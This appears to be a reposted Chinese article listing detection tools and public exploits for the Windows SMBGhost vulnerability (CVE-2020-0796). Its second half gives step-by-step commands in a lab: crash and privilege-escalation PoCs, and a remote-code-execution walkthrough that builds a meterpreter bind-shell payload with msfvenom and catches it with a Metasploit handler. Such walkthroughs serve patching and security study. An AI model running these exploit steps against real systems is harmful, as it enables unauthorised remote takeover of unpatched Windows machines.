admin管理员组文章数量:1658830
自2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁后,时隔数月,远程利用PoC代码已经被公布,这也意味着这场漏洞风波即将告一段落了。
本文汇总了多个CVE-2020-0796 漏洞检测及利用工具,方便系统管理员对未修复漏洞的系统进行检测和防护。
漏洞检测篇
git 脚本检测:
https://github/ollypwn/SMBGhost
检测返回的数据包中SMB压缩版本,这种检测方式打过补丁依然会误报。
奇安信检测工具:
http://dl.qianxin/skylar6/CVE-2020-0796-Scanner.zip
适用于局域网批量检测,快速查找未打补丁的机器。
腾讯电脑管家SMB漏洞修复工具:
http://dlied6.qq/invc/QQPatch/QuickFix_SMB0796.exe
适用于个人用户检测,一键快速检测和修复。
漏洞利用篇
蓝屏PoC:
https://github/eerykitty/CVE-2020-0796-PoC
使用两台虚拟机作为漏洞演示,一台win10 1903版本,一台是Kali Linux。
git clone https://github/eerykitty/CVE-2020-0796-PoC.gitpython3 setup.py installpython3 CVE-2020-0796.py 192.168.172.128
本地提权PoC:
https://github/danigargu/CVE-2020-0796
本地普通用户Bypass执行提权exp后弹出cmd窗口,成功获取system权限。
远程利用PoC:
https://github/chompie1337/SMBGhost_RCE_PoC
漏洞演示过程:
1、使用msfvenom生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o evil.py
2、将evil.py 生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。
root@kali:~# git clone https://github/chompie1337/SMBGhost_RCE_PoC.gitroot@kali:~# cd SMBGhost_RCE_PoC/root@kali:~/SMBGhost_RCE_PoC# lsexploit.py kernel_shellcode.asm lznt1.py __pycache__ README.md smb_win.py
3、运行exploit.py
python3 exploit.py -ip 192.168.172.128
4、启动msf监听本地端口(PS:监听端口如果一直收不到shell,可重新运行一次。)
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set lport 1234lport => 1234msf5 exploit(multi/handler) > set rhost 192.168.172.128rhost => 192.168.172.128msf5 exploit(multi/handler) > exploit
版权声明:本文标题:CVE-2020-0796 漏洞检测及利用工具 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729825877a1214100.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论